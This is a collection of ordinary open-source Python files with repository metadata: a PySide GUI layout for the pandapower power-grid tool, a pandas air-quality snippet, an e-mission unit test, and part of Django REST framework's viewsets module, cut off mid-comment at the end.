palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.main_message.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
font.setWeight(75)
font.setBold(True)
self.main_message.setFont(font)
self.main_message.setProperty("cursor", QtCore.Qt.ArrowCursor)
self.main_message.setFrameShape(QtGui.QFrame.Box)
self.main_message.setFrameShadow(QtGui.QFrame.Plain)
self.main_message.setObjectName("main_message")
self.main_empty = QtGui.QPushButton(self.main)
self.main_empty.setGeometry(QtCore.QRect(10, 10, 91, 31))
self.main_empty.setObjectName("main_empty")
self.tabWidget.addTab(self.main, "")
self.inspect = QtGui.QWidget()
self.inspect.setObjectName("inspect")
self.inspect_ext_grid = QtGui.QPushButton(self.inspect)
self.inspect_ext_grid.setGeometry(QtCore.QRect(10, 160, 91, 31))
self.inspect_ext_grid.setObjectName("inspect_ext_grid")
self.inspect_xward = QtGui.QPushButton(self.inspect)
self.inspect_xward.setGeometry(QtCore.QRect(10, 370, 91, 31))
self.inspect_xward.setObjectName("inspect_xward")
self.inspect_load = QtGui.QPushButton(self.inspect)
self.inspect_load.setGeometry(QtCore.QRect(10, 100, 91, 31))
self.inspect_load.setObjectName("inspect_load")
self.inspect_dcline = QtGui.QPushButton(self.inspect)
self.inspect_dcline.setGeometry(QtCore.QRect(10, 400, 91, 31))
self.inspect_dcline.setObjectName("inspect_dcline")
self.inspect_shunt = QtGui.QPushButton(self.inspect)
self.inspect_shunt.setGeometry(QtCore.QRect(10, 280, 91, 31))
self.inspect_shunt.setObjectName("inspect_shunt")
self.inspect_trafo = QtGui.QPushButton(self.inspect)
self.inspect_trafo.setGeometry(QtCore.QRect(10, 190, 91, 31))
self.inspect_trafo.setObjectName("inspect_trafo")
self.inspect_trafo3w = QtGui.QPushButton(self.inspect)
self.inspect_trafo3w.setGeometry(QtCore.QRect(10, 220, 91, 31))
self.inspect_trafo3w.setObjectName("inspect_trafo3w")
self.inspect_gen = QtGui.QPushButton(self.inspect)
self.inspect_gen.setGeometry(QtCore.QRect(10, 250, 91, 31))
self.inspect_gen.setObjectName("inspect_gen")
self.inspect_impedance = QtGui.QPushButton(self.inspect)
self.inspect_impedance.setGeometry(QtCore.QRect(10, 310, 91, 31))
self.inspect_impedance.setObjectName("inspect_impedance")
self.inspect_sgen = QtGui.QPushButton(self.inspect)
self.inspect_sgen.setGeometry(QtCore.QRect(10, 130, 91, 31))
self.inspect_sgen.setObjectName("inspect_sgen")
self.inspect_switch = QtGui.QPushButton(self.inspect)
self.inspect_switch.setGeometry(QtCore.QRect(10, 70, 91, 31))
self.inspect_switch.setObjectName("inspect_switch")
self.inspect_measurement = QtGui.QPushButton(self.inspect)
self.inspect_measurement.setGeometry(QtCore.QRect(10, 430, 91, 31))
self.inspect_measurement.setObjectName("inspect_measurement")
self.inspect_ward = QtGui.QPushButton(self.inspect)
self.inspect_ward.setGeometry(QtCore.QRect(10, 340, 91, 31))
self.inspect_ward.setObjectName("inspect_ward")
self.inspect_message = QtGui.QTextBrowser(self.inspect)
self.inspect_message.setGeometry(QtCore.QRect(110, 10, 861, 581))
self.inspect_message.setFrameShape(QtGui.QFrame.Box)
self.inspect_message.setObjectName("inspect_message")
self.inspect_lines = QtGui.QPushButton(self.inspect)
self.inspect_lines.setGeometry(QtCore.QRect(10, 40, 91, 31))
self.inspect_lines.setObjectName("inspect_lines")
self.inspect_bus = QtGui.QPushButton(self.inspect)
self.inspect_bus.setGeometry(QtCore.QRect(10, 10, 91, 31))
self.inspect_bus.setObjectName("inspect_bus")
self.tabWidget.addTab(self.inspect, "")
self.html = QtGui.QWidget()
self.html.setObjectName("html")
self.html_webview = QtWebKit.QWebView(self.html)
self.html_webview.setGeometry(QtCore.QRect(110, 10, 861, 581))
self.html_webview.setUrl(QtCore.QUrl("about:blank"))
self.html_webview.setRenderHints(QtGui.QPainter.SmoothPixmapTransform|QtGui.QPainter.TextAntialiasing)
self.html_webview.setObjectName("html_webview")
self.html_show = QtGui.QPushButton(self.html)
self.html_show.setGeometry(QtCore.QRect(10, 10, 91, 31))
self.html_show.setObjectName("html_show")
self.tabWidget.addTab(self.html, "")
self.res = QtGui.QWidget()
self.res.setObjectName("res")
self.res_impedance = QtGui.QPushButton(self.res)
self.res_impedance.setGeometry(QtCore.QRect(10, 280, 91, 31))
self.res_impedance.setObjectName("res_impedance")
self.res_shunt = QtGui.QPushButton(self.res)
self.res_shunt.setGeometry(QtCore.QRect(10, 250, 91, 31))
self.res_shunt.setObjectName("res_shunt")
self.res_xward = QtGui.QPushButton(self.res)
self.res_xward.setGeometry(QtCore.QRect(10, 340, 91, 31))
self.res_xward.setObjectName("res_xward")
self.res_sgen = QtGui.QPushButton(self.res)
self.res_sgen.setGeometry(QtCore.QRect(10, 100, 91, 31))
self.res_sgen.setObjectName("res_sgen")
self.res_ward = QtGui.QPushButton(self.res)
self.res_ward.setGeometry(QtCore.QRect(10, 310, 91, 31))
self.res_ward.setObjectName("res_ward")
self.res_gen = QtGui.QPushButton(self.res)
self.res_gen.setGeometry(QtCore.QRect(10, 220, 91, 31))
self.res_gen.setObjectName("res_gen")
self.res_message = QtWebKit.QWebView(self.res)
self.res_message.setGeometry(QtCore.QRect(110, 10, 861, 551))
self.res_message.setStyleSheet("\n"
" table {border-collapse: collapse;width: 100%;}\n"
" tr:first {background:#e1e1e1;}\n"
" th,td {text-align:left; border:1px solid #e1e1e1;}\n"
" th {background-color: #4CAF50;color: white;}\n"
" tr:nth-child(even){background-color: #f2f2f2;}\n"
" ")
self.res_message.setUrl(QtCore.QUrl("about:blank"))
self.res_message.setObjectName("res_message")
self.res_bus = QtGui.QPushButton(self.res)
self.res_bus.setGeometry(QtCore.QRect(10, 10, 91, 31))
self.res_bus.setObjectName("res_bus")
self.res_trafo = QtGui.QPushButton(self.res)
self.res_trafo.setGeometry(QtCore.QRect(10, 160, 91, 31))
self.res_trafo.setObjectName("res_trafo")
self.res_ext_grid = QtGui.QPushButton(self.res)
self.res_ext_grid.setGeometry(QtCore.QRect(10, 130, 91, 31))
self.res_ext_grid.setObjectName("res_ext_grid")
self.res_lines = QtGui.QPushButton(self.res)
self.res_lines.setGeometry(QtCore.QRect(10, 40, 91, 31))
self.res_lines.setObjectName("res_lines")
self.res_trafo3w = QtGui.QPushButton(self.res)
self.res_trafo3w.setGeometry(QtCore.QRect(10, 190, 91, 31))
self.res_trafo3w.setObjectName("res_trafo3w")
self.res_dcline = QtGui.QPushButton(self.res)
self.res_dcline.setGeometry(QtCore.QRect(10, 370, 91, 31))
self.res_dcline.setObjectName("res_dcline")
self.res_load = QtGui.QPushButton(self.res)
self.res_load.setGeometry(QtCore.QRect(10, 70, 91, 31))
self.res_load.setObjectName("res_load")
self.tabWidget.addTab(self.res, "")
self.build = QtGui.QWidget()
self.build.setObjectName("build")
self.groupBox = QtGui.QGroupBox(self.build)
self.groupBox.setGeometry(QtCore.QRect(110, 0, 121, 281))
self.groupBox.setObjectName("groupBox")
self.create_bus = QtGui.QRadioButton(self.groupBox)
self.create_bus.setGeometry(QtCore.QRect(10, 50, 82, 17))
self.create_bus.setObjectName("create_bus")
self.create_line = QtGui.QRadioButton(self.groupBox)
self.create_line.setGeometry(QtCore.QRect(10, 80, 82, 17))
self.create_line.setObjectName("create_line")
self.create_trafo = QtGui.QRadioButton(self.groupBox)
self.create_trafo.setGeometry(QtCore.QRect(10, 110, 82, 17))
self.create_trafo.setObjectName("create_trafo")
self.create_edit_elements = QtGui.QRadioButton(self.groupBox)
self.create_edit_elements.setGeometry(QtCore.QRect(10, 20, 82, 17))
self.create_edit_elements.setChecked(True)
self.create_edit_elements.setObjectName("create_edit_elements")
self.create_ext_grid = QtGui.QRadioButton(self.groupBox)
self.create_ext_grid.setGeometry(QtCore.QRect(10, 140, 101, 17))
self.create_ext_grid.setObjectName("create_ext_grid")
self.create_load = QtGui.QRadioButton(self.groupBox)
self.create_load.setGeometry(QtCore.QRect(10, 170, 82, 17))
self.create_load.setObjectName("create_load")
self.create_gen = QtGui.QRadioButton(self.groupBox)
self.create_gen.setGeometry(QtCore.QRect(10, 200, 82, 17))
self.create_gen.setObjectName("create_gen")
self.create_sgen = QtGui.QRadioButton(self.groupBox)
self.create_sgen.setGeometry(QtCore.QRect(10, 230, 82, 17))
self.create_sgen.setObjectName("create_sgen")
self.build_shunt = QtGui.QPushButton(self.build)
self.build_shunt.setGeometry(QtCore.QRect(10, 270, 91, 31))
self.build_shunt.setObjectName("build_shunt")
self.main_build_frame = QtGui.QWidget(self.build)
self.main_build_frame.setGeometry(QtCore.QRect(240, 0, 801, 581))
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.main_build_frame.sizePolicy().hasHeightForWidth())
self.main_build_frame.setSizePolicy(sizePolicy)
self.main_build_frame.setObjectName("main_build_frame")
self.gridLayout = QtGui.QVBoxLayout(self.main_build_frame)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.build_impedance = QtGui.QPushButton(self.build)
self.build_impedance.setGeometry(QtCore.QRect(10, 300, 91, 31))
self.build_impedance.setObjectName("build_impedance")
self.build_bus = QtGui.QPushButton(self.build)
self.build_bus.setGeometry(QtCore.QRect(10, 0, 91, 31))
self.build_bus.setObjectName("build_bus")
self.build_message = QtGui.QTextBrowser(self.build)
self.build_message.setGeometry(QtCore.QRect(10, 460, 221, 231))
self.build_message.setFrameShape(QtGui.QFrame.Box)
self.build_message.setObjectName("build_message")
self.build_ward = QtGui.QPushButton(self.build)
self.build_ward.setGeometry(QtCore.QRect(10, 330, 91, 31))
self.build_ward.setObjectName("build_ward")
self.build_measurement = QtGui.QPushButton(self.build)
self.build_measurement.setGeometry(QtCore.QRect(10, 420, 91, 31))
self.build_measurement.setObjectName("build_measurement")
self.build_sgen = QtGui.QPushButton(self.build)
self.build_sgen.setGeometry(QtCore.QRect(10, 120, 91, 31))
self.build_sgen.setObjectName("build_sgen")
self.build_switch = QtGui.QPushButton(self.build)
self.build_switch.setGeometry(QtCore.QRect(10, 60, 91, 31))
self.build_switch.setObjectName("build_switch")
self.build_trafo3w = QtGui.QPushButton(self.build)
self.build_trafo3w.setGeometry(QtCore.QRect(10, 210, 91, 31))
self.build_trafo3w.setObjectName("build_trafo3w")
self.build_gen = QtGui.QPushButton(self.build)
self.build_gen.setGeometry(QtCore.QRect(10, 240, 91, 31))
self.build_gen.setObjectName("build_gen")
self.build_lines = QtGui.QPushButton(self.build)
self.build_lines.setGeometry(QtCore.QRect(10, 30, 91, 31))
self.build_lines.setObjectName("build_lines")
self.build_ext_grid = QtGui.QPushButton(self.build)
self.build_ext_grid.setGeometry(QtCore.QRect(10, 150, 91, 31))
self.build_ext_grid.setObjectName("build_ext_grid")
self.build_trafo = QtGui.QPushButton(self.build)
self.build_trafo.setGeometry(QtCore.QRect(10, 180, 91, 31))
self.build_trafo.setObjectName("build_trafo")
self.build_load = QtGui.QPushButton(self.build)
self.build_load.setGeometry(QtCore.QRect(10, 90, 91, 31))
self.build_load.setObjectName("build_load")
self.build_dcline = QtGui.QPushButton(self.build)
self.build_dcline.setGeometry(QtCore.QRect(10, 390, 91, 31))
self.build_dcline.setObjectName("build_dcline")
self.build__xward = QtGui.QPushButton(self.build)
self.build__xward.setGeometry(QtCore.QRect(10, 360, 91, 31))
self.build__xward.setObjectName("build__xward")
self.tabWidget.addTab(self.build, "")
self.interpreter = QtGui.QWidget()
self.interpreter.setObjectName("interpreter")
self.verticalLayoutWidget_2 = QtGui.QWidget(self.interpreter)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(120, 30, 711, 561))
self.verticalLayoutWidget_2.setObjectName("verticalLayoutWidget_2")
self.interpreter_vbox = QtGui.QVBoxLayout(self.verticalLayoutWidget_2)
self.interpreter_vbox.setContentsMargins(0, 0, 0, 0)
self.interpreter_vbox.setObjectName("interpreter_vbox")
self.tabWidget.addTab(self.interpreter, "")
self.report = QtGui.QWidget()
self.report.setObjectName("report")
self.report_message = QtGui.QTextBrowser(self.report)
self.report_message.setGeometry(QtCore.QRect(80, 20, 851, 571))
self.report_message.setFrameShape(QtGui.QFrame.Box)
self.report_message.setObjectName("report_message")
self.tabWidget.addTab(self.report, "")
self.help = QtGui.QWidget()
self.help.setObjectName("help")
self.verticalLayoutWidget_3 = QtGui.QWidget(self.help)
self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(20, 20, 961, 581))
self.verticalLayoutWidget_3.setObjectName("verticalLayoutWidget_3")
self.verticalLayout_6 = QtGui.QVBoxLayout(self.verticalLayoutWidget_3)
self.verticalLayout_6.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.webView = QtWebKit.QWebView(self.verticalLayoutWidget_3)
self.webView.setUrl(QtCore.QUrl("http://pandapower.readthedocs.io/en/v1.3.0/"))
self.webView.setObjectName("webView")
self.verticalLayout_6.addWidget(self.webView)
self.tabWidget.addTab(self.help, "")
self.tab = QtGui.QWidget()
self.tab.setObjectName("tab")
self.tabWidget.addTab(self.tab, "")
self.verticalLayout.addWidget(self.tabWidget)
pandapower.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(pandapower)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1023, 21))
self.menubar.setObjectName("menubar")
pandapower.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(pandapower)
self.statusbar.setObjectName("statusbar")
pandapower.setStatusBar(self.statusbar)
self.retranslateUi(pandapower)
self.tabWidget.setCurrentIndex(4)
QtCore.QMetaObject.connectSlotsByName(pandapower)
def retranslateUi(self, pandapower):
pandapower.setWindowTitle(QtGui.QApplication.translate("pandapower", "pandapower", None, QtGui.QApplication.UnicodeUTF8))
self.main_save.setText(QtGui.QApplication.translate("pandapower", "Save Network", None, QtGui.QApplication.UnicodeUTF8))
self.main_losses.setText(QtGui.QApplication.translate("pandapower", "Losses Report", None, QtGui.QApplication.UnicodeUTF8))
self.main_load.setText(QtGui.QApplication.translate("pandapower", "Load Network", None, QtGui.QApplication.UnicodeUTF8))
self.main_solve.setText(QtGui.QApplication.translate("pandapower", "Solve (runpp)", None, QtGui.QApplication.UnicodeUTF8))
self.main_empty.setText(QtGui.QApplication.translate("pandapower", "Empty Network", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.main), QtGui.QApplication.translate("pandapower", "Main Menu", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_ext_grid.setText(QtGui.QApplication.translate("pandapower", "External Grid", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_xward.setText(QtGui.QApplication.translate("pandapower", "Extended Ward", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_load.setText(QtGui.QApplication.translate("pandapower", "Load", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_dcline.setText(QtGui.QApplication.translate("pandapower", "DC Line", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_shunt.setText(QtGui.QApplication.translate("pandapower", "Shunt", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_trafo.setText(QtGui.QApplication.translate("pandapower", "Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_trafo3w.setText(QtGui.QApplication.translate("pandapower", "3W-Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_gen.setText(QtGui.QApplication.translate("pandapower", "Generator", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_impedance.setText(QtGui.QApplication.translate("pandapower", "Impedance", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_sgen.setText(QtGui.QApplication.translate("pandapower", "Stat Gen", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_switch.setText(QtGui.QApplication.translate("pandapower", "Switch", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_measurement.setText(QtGui.QApplication.translate("pandapower", "Measurement", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_ward.setText(QtGui.QApplication.translate("pandapower", "Ward", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_lines.setText(QtGui.QApplication.translate("pandapower", "Lines", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_bus.setText(QtGui.QApplication.translate("pandapower", "Bus", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.inspect), QtGui.QApplication.translate("pandapower", "Network Model", None, QtGui.QApplication.UnicodeUTF8))
self.html_show.setText(QtGui.QApplication.translate("pandapower", "HTML", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.html), QtGui.QApplication.translate("pandapower", "HTML Report", None, QtGui.QApplication.UnicodeUTF8))
self.res_impedance.setText(QtGui.QApplication.translate("pandapower", "Impedance", None, QtGui.QApplication.UnicodeUTF8))
self.res_shunt.setText(QtGui.QApplication.translate("pandapower", "Shunt", None, QtGui.QApplication.UnicodeUTF8))
self.res_xward.setText(QtGui.QApplication.translate("pandapower", "Extended Ward", None, QtGui.QApplication.UnicodeUTF8))
self.res_sgen.setText(QtGui.QApplication.translate("pandapower", "Stat Gen", None, QtGui.QApplication.UnicodeUTF8))
self.res_ward.setText(QtGui.QApplication.translate("pandapower", "Ward", None, QtGui.QApplication.UnicodeUTF8))
self.res_gen.setText(QtGui.QApplication.translate("pandapower", "Generator", None, QtGui.QApplication.UnicodeUTF8))
self.res_bus.setText(QtGui.QApplication.translate("pandapower", "Bus", None, QtGui.QApplication.UnicodeUTF8))
self.res_trafo.setText(QtGui.QApplication.translate("pandapower", "Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.res_ext_grid.setText(QtGui.QApplication.translate("pandapower", "External Grid", None, QtGui.QApplication.UnicodeUTF8))
self.res_lines.setText(QtGui.QApplication.translate("pandapower", "Lines", None, QtGui.QApplication.UnicodeUTF8))
self.res_trafo3w.setText(QtGui.QApplication.translate("pandapower", "3W-Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.res_dcline.setText(QtGui.QApplication.translate("pandapower", "DC Line", None, QtGui.QApplication.UnicodeUTF8))
self.res_load.setText(QtGui.QApplication.translate("pandapower", "Load", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.res), QtGui.QApplication.translate("pandapower", "Load Flow Results", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox.setTitle(QtGui.QApplication.translate("pandapower", "Mode", None, QtGui.QApplication.UnicodeUTF8))
self.create_bus.setText(QtGui.QApplication.translate("pandapower", "Create Bus", None, QtGui.QApplication.UnicodeUTF8))
self.create_line.setText(QtGui.QApplication.translate("pandapower", "Create Line", None, QtGui.QApplication.UnicodeUTF8))
self.create_trafo.setText(QtGui.QApplication.translate("pandapower", "Create Trafo", None, QtGui.QApplication.UnicodeUTF8))
self.create_edit_elements.setText(QtGui.QApplication.translate("pandapower", "Edit Elements", None, QtGui.QApplication.UnicodeUTF8))
self.create_ext_grid.setText(QtGui.QApplication.translate("pandapower", "Create Ext grid", None, QtGui.QApplication.UnicodeUTF8))
self.create_load.setText(QtGui.QApplication.translate("pandapower", "Create Load", None, QtGui.QApplication.UnicodeUTF8))
self.create_gen.setText(QtGui.QApplication.translate("pandapower", "Create Gen", None, QtGui.QApplication.UnicodeUTF8))
self.create_sgen.setText(QtGui.QApplication.translate("pandapower", "Create sGen", None, QtGui.QApplication.UnicodeUTF8))
self.build_shunt.setText(QtGui.QApplication.translate("pandapower", "Shunt", None, QtGui.QApplication.UnicodeUTF8))
self.build_impedance.setText(QtGui.QApplication.translate("pandapower", "Impedance", None, QtGui.QApplication.UnicodeUTF8))
self.build_bus.setText(QtGui.QApplication.translate("pandapower", "Bus", None, QtGui.QApplication.UnicodeUTF8))
self.build_ward.setText(QtGui.QApplication.translate("pandapower", "Ward", None, QtGui.QApplication.UnicodeUTF8))
self.build_measurement.setText(QtGui.QApplication.translate("pandapower", "Measurement", None, QtGui.QApplication.UnicodeUTF8))
self.build_sgen.setText(QtGui.QApplication.translate("pandapower", "Stat Gen", None, QtGui.QApplication.UnicodeUTF8))
self.build_switch.setText(QtGui.QApplication.translate("pandapower", "Switch", None, QtGui.QApplication.UnicodeUTF8))
self.build_trafo3w.setText(QtGui.QApplication.translate("pandapower", "3W-Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.build_gen.setText(QtGui.QApplication.translate("pandapower", "Generator", None, QtGui.QApplication.UnicodeUTF8))
self.build_lines.setText(QtGui.QApplication.translate("pandapower", "Lines", None, QtGui.QApplication.UnicodeUTF8))
self.build_ext_grid.setText(QtGui.QApplication.translate("pandapower", "External Grid", None, QtGui.QApplication.UnicodeUTF8))
self.build_trafo.setText(QtGui.QApplication.translate("pandapower", "Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.build_load.setText(QtGui.QApplication.translate("pandapower", "Load", None, QtGui.QApplication.UnicodeUTF8))
self.build_dcline.setText(QtGui.QApplication.translate("pandapower", "DC Line", None, QtGui.QApplication.UnicodeUTF8))
self.build__xward.setText(QtGui.QApplication.translate("pandapower", "Extended Ward", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.build), QtGui.QApplication.translate("pandapower", "Add Elements", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.interpreter), QtGui.QApplication.translate("pandapower", "Interpreter", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.report), QtGui.QApplication.translate("pandapower", "Report", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.help), QtGui.QApplication.translate("pandapower", "Documentation", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), QtGui.QApplication.translate("pandapower", "About", None, QtGui.QApplication.UnicodeUTF8))
from PySide import QtWebKit
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
pandapower = QtGui.QMainWindow()
ui = Ui_pandapower()
ui.setupUi(pandapower)
pandapower.show()
sys.exit(app.exec_())
|
Tooblippe/pandapower_gui
|
resources/ui/builder.py
|
Python
|
bsd-3-clause
| 35,136
|
# Weekly 95th-percentile concentrations per station (BETN029, BETR801) for 2011.
df2011 = data['2011'].dropna()
df2011.groupby(df2011.index.week)[['BETN029', 'BETR801']].quantile(0.95).plot()
|
jorisvandenbossche/2015-EuroScipy-pandas-tutorial
|
snippets/07 - Case study - air quality data64.py
|
Python
|
bsd-2-clause
| 110
|
# Standard imports
import unittest
import json
import logging
from datetime import datetime, timedelta
# Our imports
from emission.core.get_database import get_db, get_mode_db, get_section_db
from emission.analysis.result.precompute import precompute_results
from emission.core.wrapper.user import User
from emission.core.wrapper.client import Client
import emission.tests.common
from emission.clients.testclient import testclient
from emission.clients.data import data
logging.basicConfig(level=logging.DEBUG)
class TestPrecomputeResults(unittest.TestCase):
def setUp(self):
self.testUsers = ["test@example.com", "best@example.com", "fest@example.com",
"rest@example.com", "nest@example.com"]
self.serverName = 'localhost'
# Sometimes, we may have entries left behind in the database if one of the tests failed
# or threw an exception, so let us start by cleaning up all entries
emission.tests.common.dropAllCollections(get_db())
self.ModesColl = get_mode_db()
self.assertEquals(self.ModesColl.find().count(), 0)
self.SectionsColl = get_section_db()
self.assertEquals(self.SectionsColl.find().count(), 0)
emission.tests.common.loadTable(self.serverName, "Stage_Modes", "emission/tests/data/modes.json")
emission.tests.common.loadTable(self.serverName, "Stage_Sections", "emission/tests/data/testModeInferFile")
# Let's make sure that the users are registered so that they have profiles
for userEmail in self.testUsers:
User.register(userEmail)
self.now = datetime.now()
self.dayago = self.now - timedelta(days=1)
self.weekago = self.now - timedelta(weeks = 1)
for section in self.SectionsColl.find():
section['section_start_datetime'] = self.dayago
section['section_end_datetime'] = self.dayago + timedelta(hours = 1)
if (section['confirmed_mode'] == 5):
# We only cluster bus and train trips
# And our test data only has bus trips
section['section_start_point'] = {u'type': u'Point', u'coordinates': [-122.270039042, 37.8800285728]}
section['section_end_point'] = {u'type': u'Point', u'coordinates': [-122.2690412952, 37.8739578595]}
# print("Section start = %s, section end = %s" %
# (section['section_start_datetime'], section['section_end_datetime']))
# Replace the user email with the UUID
section['user_id'] = User.fromEmail(section['user_id']).uuid
self.SectionsColl.save(section)
self.pr = precompute_results.PrecomputeResults()
def testClientSpecificPrecompute(self):
for email in self.testUsers:
currUser = User.fromEmail(email)
self.assertEqual(currUser.getProfile().get("testfield1"), None)
self.assertEqual(currUser.getProfile().get("testfield2"), None)
self.assertEqual(data.getCarbonFootprint(currUser), None)
fakeEmail = "fest@example.com"
client = Client("testclient")
client.update(createKey = False)
emission.tests.common.makeValid(client)
(resultPre, resultReg) = client.preRegister("this_is_the_super_secret_id", fakeEmail)
user = User.fromEmail(fakeEmail)
self.assertEqual(user.getFirstStudy(), 'testclient')
self.pr.precomputeResults()
self.assertEqual(user.getProfile()['testfield1'], 'value1')
self.assertEqual(user.getProfile()['testfield2'], 'value2')
for email in self.testUsers:
if email != fakeEmail:
currUser = User.fromEmail(email)
carbonFootprint = data.getCarbonFootprint(currUser)
self.assertEqual(len(carbonFootprint), 12)
if __name__ == '__main__':
unittest.main()
|
joshzarrabi/e-mission-server
|
emission/tests/analysisTests/result_precompute/TestPrecomputeResults.py
|
Python
|
bsd-3-clause
| 3,850
|
"""
ViewSets are essentially just a type of class based view, that doesn't provide
any method handlers, such as `get()`, `post()`, etc... but instead has actions,
such as `list()`, `retrieve()`, `create()`, etc...
Actions are only bound to methods at the point of instantiating the views.
user_list = UserViewSet.as_view({'get': 'list'})
user_detail = UserViewSet.as_view({'get': 'retrieve'})
Typically, rather than instantiate views from viewsets directly, you'll
register the viewset with a router and let the URL conf be determined
automatically.
router = DefaultRouter()
router.register(r'users', UserViewSet, 'user')
urlpatterns = router.urls
"""
from __future__ import unicode_literals
from functools import update_wrapper
from django.utils.decorators import classonlymethod
from django.views.decorators.csrf import csrf_exempt
from rest_framework import views, generics, mixins
class ViewSetMixin(object):
"""
This is the magic.
Overrides `.as_view()` so that it takes an `actions` keyword that performs
the binding of HTTP methods to actions on the Resource.
For example, to create a concrete view binding the 'GET' and 'POST' methods
to the 'list' and 'create' actions...
view = MyViewSet.as_view({'get': 'list', 'post': 'create'})
"""
@classonlymethod
def as_view(cls, actions=None, **initkwargs):
"""
Because of the way class based views create a closure around the
instantiated view, we need to totally reimplement `.as_view`,
and slightly modify the view function that is created and returned.
"""
# The suffix initkwarg is reserved for identifying the viewset type
# eg. 'List' or 'Instance'.
cls.suffix = None
# actions must not be empty
if not actions:
raise TypeError("The `actions` argument must be provided when "
"calling `.as_view()` on a ViewSet. For example "
"`.as_view({'get': 'list'})`")
# sanitize keyword arguments
for key in initkwargs:
if key in cls.http_method_names:
raise TypeError("You tried to pass in the %s method name as a "
"keyword argument to %s(). Don't do that."
% (key, cls.__name__))
if not hasattr(cls, key):
raise TypeError("%s() received an invalid keyword %r" % (
cls.__name__, key))
def view(request, *args, **kwargs):
self = cls(**initkwargs)
# We also store the mapping of request methods to actions,
# so that we can later set the action attribute.
# eg. `self.action = 'list'` on an incoming GET request.
self.action_map = actions
# Bind methods to actions
# This is the bit that's different to a standard view
for method, action in actions.items():
handler = getattr(self, action)
setattr(self, method, handler)
# Patch this in as it's otherwise only present from 1.5 onwards
if hasattr(self, 'get') and not hasattr(self, 'head'):
self.head = self.get
# And continue as usual
return self.dispatch(request, *args, **kwargs)
# take name and docstring from class
update_wrapper(view, cls, updated=())
# and possible attributes set by decorators
# like csrf_exempt from dispatch
update_wrapper(view, cls.dispatch, assigned=())
# We need to set these on the view function, so that breadcrumb
# generation can pick out these bits of information from a
# resolved URL.
view.cls = cls
view.suffix = initkwargs.get('suffix', None)
return csrf_exempt(view)
def initialize_request(self, request, *args, **kwargs):
"""
Set the `.action` attribute on the view,
depending on the request method.
"""
request = super(ViewSetMixin, self).initialize_request(request, *args, **kwargs)
self.action = self.action_map.get(request.method.lower())
return request
class ViewSet(ViewSetMixin, views.APIView):
"""
The base ViewSet class does not provide any actions by default.
"""
pass
class GenericViewSet(ViewSetMixin, generics.GenericAPIView):
"""
The GenericViewSet class does not provide any actions by default,
but does include the base set of generic view behavior, such as
the `get_object` and `get_queryset` methods.
"""
pass
class ReadOnlyModelViewSet(mixins.RetrieveModelMixin,
mixins.ListModelMixin,
GenericViewSet):
"""
A viewset that provides default `list()` and `retrieve()` actions.
"""
pass
class ModelViewSet(mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.ListModelMixin,
GenericViewSet):
"""
A viewset that provides default `create()`, `retrieve()`, `update()`,
`partial_update()`, `destroy()` and `list()` actions.
"""
pass
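# Editor's note: a minimal standalone sketch (not part of rest_framework) of
# the method-to-action binding that ViewSetMixin.as_view() performs above.
# `_FakeViewSet` and the `actions` dict are hypothetical; the point is that a
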